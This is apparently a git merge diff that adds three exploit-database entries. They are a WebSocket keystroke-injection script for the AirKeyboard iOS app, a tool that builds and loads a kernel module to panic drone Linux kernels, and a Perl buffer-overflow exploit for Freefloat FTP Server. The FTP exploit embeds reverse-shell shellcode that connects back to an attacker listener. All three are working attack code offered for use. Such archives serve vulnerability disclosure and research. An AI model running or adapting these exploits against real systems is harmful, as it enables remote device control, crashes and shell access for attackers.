Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/ios/remote/52333.py

@@ -0,0 +1,61 @@
+# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection
+# Date: 2025-06-13
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://airkeyboardapp.com
+# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
+# Version: Version 1.0.5
+# Tested on: iOS 18.5 with AirKeyboard app
+
+
+'''
+Description:
+  The AirKeyboard iOS application exposes a WebSocket server on port 8888
+which accepts arbitrary input injection messages from any client.
+  No authentication or pairing process is required. This allows any
+attacker to type arbitrary keystrokes directly into the victim’s iOS device
+  in real-time without user interaction, resulting in full remote input
+control.
+'''
+
+import websocket
+import json
+import time
+
+target_ip = "192.168.8.101"
+ws_url = f"ws://{target_ip}:8888"
+text = "i'm hacker i can write on your keyboard :)"
+
+keystroke_payload = {
+    "type": 1,
+    "text": f"{text}",
+    "mode": 0,
+    "shiftKey": True,
+    "selectionStart": 1,
+    "selectionEnd": 1
+}
+
+def send_payload(ws):
+    print("[+] Sending remote keystroke...")
+    ws.send(json.dumps(keystroke_payload))
+    time.sleep(1)
+    ws.close()
+
+def on_open(ws):
+    send_payload(ws)
+
+def on_error(ws, error):
+    print(f"[!] Error: {error}")
+
+def on_close(ws, close_status_code, close_msg):
+    print("[*] Connection closed")
+
+def exploit():
+    print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
+    ws = websocket.WebSocketApp(ws_url,
+                                 on_open=on_open,
+                                 on_error=on_error,
+                                 on_close=on_close)
+    ws.run_forever()
+
+if __name__ == "__main__":
+    exploit()

exploits/multiple/local/52329.py

@@ -0,0 +1,223 @@
+#!/usr/bin/env python3
+# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit
+# Author: Mohammed Idrees Banyamer
+# Instagram: @banyamer_security
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-06-10
+# Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M
+# CVE: CVE-2025-37928
+# Type: Local Privilege Escalation / Kernel Panic
+# Platform: Linux-based drone OS (Parrot and DJI variants)
+# Author Country: Jordan
+# CVSS v3.1 Score: 7.3 (Important)
+# Weakness: CWE-284: Improper Access Control
+# Attack Vector: Local
+# User Interaction: None
+# Scope: Unchanged
+# Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic)
+# Exploit Code Maturity: Proof of Concept
+# Remediation Level: Official Fix Available
+#
+# Description:
+# This PoC triggers a kernel panic by calling schedule() inside an atomic context,
+# exploiting CVE-2025-37928 present in certain Linux kernels running on
+# Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems.
+#
+# Steps of exploitation:
+# 1. Check if running as root.
+# 2. Verify kernel version vulnerability.
+# 3. Detect drone type from system files.
+# 4. Build and load vulnerable kernel module.
+# 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context.
+#
+# Affected Drone Versions:
+# - Parrot QRD
+# - Parrot Alpha-M (DT)
+# - DJI QRD
+# - DJI Alpha-M (DT)
+#
+# ------------------------------------------------------------------------------
+#  Usage:
+#   sudo python3 cve_2025_37928_tool.py [OPTIONS]
+#
+#  Options:
+#   --dry-run         Run detection & build only (no module loading)
+#   --force           Force exploit even if kernel not detected as vulnerable
+#   --cleanup-only    Remove the kernel module without triggering panic
+#   --verbose         Enable detailed logging and debug output
+#   --help            Show usage information
+#
+#  Examples:
+#   sudo python3 cve_2025_37928_tool.py --dry-run
+#   sudo python3 cve_2025_37928_tool.py
+#   sudo python3 cve_2025_37928_tool.py --force
+#   sudo python3 cve_2025_37928_tool.py --cleanup-only
+#
+#  Warning:
+#   This PoC causes an immediate kernel panic.
+#   Use it ONLY in isolated and controlled environments (e.g., lab tests).
+# ------------------------------------------------------------------------------
+
+import os
+import sys
+import subprocess
+import tempfile
+import argparse
+import shutil
+import platform
+
+MODULE_NAME = "cve_2025_37928_poc"
+C_FILENAME = MODULE_NAME + ".c"
+KO_FILENAME = MODULE_NAME + ".ko"
+
+KERNEL_MODULE_CODE = r'''
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+#include <linux/interrupt.h>
+#include <linux/sched.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("PoC Author");
+MODULE_DESCRIPTION("PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic");
+
+static void trigger_panic_tasklet(unsigned long data)
+{
+    pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n");
+    schedule(); // This causes kernel panic
+}
+
+DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0);
+
+static int __init poc_init(void)
+{
+    pr_info("[CVE-2025-37928] Loading PoC module and scheduling tasklet...\n");
+    tasklet_schedule(&my_tasklet);
+    return 0;
+}
+
+static void __exit poc_exit(void)
+{
+    tasklet_kill(&my_tasklet);
+    pr_info("[CVE-2025-37928] PoC module unloaded\n");
+}
+
+module_init(poc_init);
+module_exit(poc_exit);
+'''
+
+MAKEFILE_CONTENT = f'''
+obj-m += {MODULE_NAME}.o
+
+all:
+\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+'''
+
+def check_root():
+    if os.geteuid() != 0:
+        print("[-] Must be run as root.")
+        sys.exit(1)
+
+def detect_kernel():
+    version = platform.release()
+    vulnerable_versions = ["5.10", "5.15", "6.0"]
+    vulnerable = any(v in version for v in vulnerable_versions)
+    print(f"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}")
+    return vulnerable
+
+def detect_drone_type():
+    print("[*] Detecting drone type...")
+    files = ["/etc/drone_type", "/proc/device-tree/model", "/sys/firmware/devicetree/base/model"]
+    found = []
+    for path in files:
+        if os.path.exists(path):
+            try:
+                with open(path, "r") as f:
+                    content = f.read().strip()
+                    if any(x in content for x in ["Parrot", "DJI"]):
+                        found.append(content)
+            except:
+                continue
+    if found:
+        for d in found:
+            print(f"  [i] Found: {d}")
+    else:
+        print("  [!] No drone ID found.")
+    return found
+
+def write_module(tempdir):
+    c_path = os.path.join(tempdir, C_FILENAME)
+    makefile_path = os.path.join(tempdir, "Makefile")
+    with open(c_path, "w") as f:
+        f.write(KERNEL_MODULE_CODE)
+    with open(makefile_path, "w") as f:
+        f.write(MAKEFILE_CONTENT)
+    return c_path
+
+def build_module(tempdir):
+    print("[*] Building module...")
+    result = subprocess.run(["make"], cwd=tempdir, capture_output=True, text=True)
+    if result.returncode != 0:
+        print("[-] Build failed:\n", result.stderr)
+        sys.exit(1)
+    print("[+] Build successful.")
+    return os.path.join(tempdir, KO_FILENAME)
+
+def load_module(ko_path):
+    print("[*] Loading kernel module...")
+    result = subprocess.run(["insmod", ko_path], capture_output=True, text=True)
+    if result.returncode != 0:
+        print("[-] insmod failed:\n", result.stderr)
+        sys.exit(1)
+    print("[!] Module loaded. Kernel panic should occur if vulnerable.")
+
+def unload_module():
+    print("[*] Attempting to remove module...")
+    subprocess.run(["rmmod", MODULE_NAME], stderr=subprocess.DEVNULL)
+    print("[+] Module removal attempted.")
+
+def clean_build(tempdir):
+    subprocess.run(["make", "clean"], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+
+def main():
+    parser = argparse.ArgumentParser(description="CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes")
+    parser.add_argument("--dry-run", action="store_true", help="Only simulate and check environment, no exploitation")
+    parser.add_argument("--force", action="store_true", help="Force execution even if version unknown")
+    parser.add_argument("--cleanup-only", action="store_true", help="Just remove kernel module if loaded")
+
+    args = parser.parse_args()
+    check_root()
+
+    if args.cleanup_only:
+        unload_module()
+        return
+
+    vulnerable = detect_kernel()
+    detect_drone_type()
+
+    if not vulnerable and not args.force:
+        print("[-] Kernel not identified as vulnerable. Use --force to override.")
+        sys.exit(1)
+
+    if args.dry_run:
+        print("[*] Dry run mode. Exiting before exploitation.")
+        return
+
+    with tempfile.TemporaryDirectory() as tempdir:
+        print(f"[*] Working directory: {tempdir}")
+        write_module(tempdir)
+        ko_path = build_module(tempdir)
+
+        try:
+            load_module(ko_path)
+        except KeyboardInterrupt:
+            print("[!] Interrupted. Attempting cleanup...")
+        finally:
+            unload_module()
+            clean_build(tempdir)
+
+if __name__ == "__main__":
+    main()

exploits/multiple/remote/52323.txt

@@ -0,0 +1,85 @@
+# Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow
+# Date: 22 may 2025
+# Notification vendor: No reported
+# Discovery by: Fernando Mengali
+# LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/
+# Version: 1.0
+# Tested on: Windows XP SP3 English - # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3)
+# Vulnerability Type: Remote Buffer Overflow
+# CVE: CVE-2025-5548
+
+#offset: 246
+
+#badchars: \x00\x0a\x0d
+
+#EIP: 0x7C86467B (JMP ESP)
+#Kernel32.dll
+
+use IO::Socket::INET;
+
+# msfvenom -p windows/shell_reverse_tcp lhost=192.168.232.129 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
+# nc -vlp 4444
+# execute exploit
+
+my $buf =
+"\xda\xd4\xbb\x4e\xd9\xfd\x96\xd9\x74\x24\xf4\x58\x2b\xc9" .
+"\xb1\x52\x31\x58\x17\x83\xc0\x04\x03\x16\xca\x1f\x63\x5a" .
+"\x04\x5d\x8c\xa2\xd5\x02\x04\x47\xe4\x02\x72\x0c\x57\xb3" .
+"\xf0\x40\x54\x38\x54\x70\xef\x4c\x71\x77\x58\xfa\xa7\xb6" .
+"\x59\x57\x9b\xd9\xd9\xaa\xc8\x39\xe3\x64\x1d\x38\x24\x98" .
+"\xec\x68\xfd\xd6\x43\x9c\x8a\xa3\x5f\x17\xc0\x22\xd8\xc4" .
+"\x91\x45\xc9\x5b\xa9\x1f\xc9\x5a\x7e\x14\x40\x44\x63\x11" .
+"\x1a\xff\x57\xed\x9d\x29\xa6\x0e\x31\x14\x06\xfd\x4b\x51" .
+"\xa1\x1e\x3e\xab\xd1\xa3\x39\x68\xab\x7f\xcf\x6a\x0b\x0b" .
+"\x77\x56\xad\xd8\xee\x1d\xa1\x95\x65\x79\xa6\x28\xa9\xf2" .
+"\xd2\xa1\x4c\xd4\x52\xf1\x6a\xf0\x3f\xa1\x13\xa1\xe5\x04" .
+"\x2b\xb1\x45\xf8\x89\xba\x68\xed\xa3\xe1\xe4\xc2\x89\x19" .
+"\xf5\x4c\x99\x6a\xc7\xd3\x31\xe4\x6b\x9b\x9f\xf3\x8c\xb6" .
+"\x58\x6b\x73\x39\x99\xa2\xb0\x6d\xc9\xdc\x11\x0e\x82\x1c" .
+"\x9d\xdb\x05\x4c\x31\xb4\xe5\x3c\xf1\x64\x8e\x56\xfe\x5b" .
+"\xae\x59\xd4\xf3\x45\xa0\xbf\x3b\x31\x42\xbe\xd4\x40\x92" .
+"\xd0\x78\xcc\x74\xb8\x90\x98\x2f\x55\x08\x81\xbb\xc4\xd5" .
+"\x1f\xc6\xc7\x5e\xac\x37\x89\x96\xd9\x2b\x7e\x57\x94\x11" .
+"\x29\x68\x02\x3d\xb5\xfb\xc9\xbd\xb0\xe7\x45\xea\x95\xd6" .
+"\x9f\x7e\x08\x40\x36\x9c\xd1\x14\x71\x24\x0e\xe5\x7c\xa5" .
+"\xc3\x51\x5b\xb5\x1d\x59\xe7\xe1\xf1\x0c\xb1\x5f\xb4\xe6" .
+"\x73\x09\x6e\x54\xda\xdd\xf7\x84\x1f\xd2\x90\x6e\x70\xeb" .
+"\x82\x52\x75\x11\x7b\x02\x0c\x9f\x7b\x6c\x48\x37\x2a\x59" .
+"\x07\x94\x51\xcc\xde\xc5\x30\x84\x22\x97\x58\x0e\x12\x72" .
+"\x5a\x1a\x4b\x9a\x5a\x7c\x4e\x04\x2e\x14\x48\xbc\x67\x9b" .
+"\x9d\x6c\xa9\x79\x0f\x4f\x08\xbd\x2e\xec\xaa\x45\x64\x09" .
+"\xe2\x98\x56\x62\xde\x65\xf2\x48\x4e\xec\x79\x1b\x4c\x9d" .
+"\xa5\xda\x47\xd3\xa5\x53\xa3\xaa\x52\x11\x25\xdb\x6a\x62" .
+"\xc3\x5a\x3a\x90\xab\x70\x4e\x74\x4a\x12\xae\x53\x54\xda" .
+"\x38\x90\x70\x58\x98\xac\x2b\xdb\x7c\x48\x5f\x1e\x4a\x4a" .
+"\x1e\x84\x28";
+
+my $offset = 246; # Será substituído depois
+my $eip = pack('V', 0x7c86467b); # Endereço JMP ESP little endian
+my $nop = "\x90" x 20;
+
+my $padding = "A" x $offset;
+my $payload = $padding . $eip . $nop . $buf;
+
+my $socket = IO::Socket::INET->new(
+    PeerAddr => '192.168.232.135',
+    PeerPort => '21',
+    Proto    => 'tcp'
+) or die "Failed to connect: $!\n";
+
+print "Connected to FTP server\n";
+
+my $response = "";
+$response = <$socket>; # banner inicial do FTP
+
+print $socket "USER anonymous\r\n";
+$response = <$socket>;
+print $socket "PASS anonymous\r\n";
+$response = <$socket>;
+
+print $socket "NOOP $payload\r\n";
+$response = <$socket>;
+
+print "Payload sent, check your listener.\n";
+
+close $socket;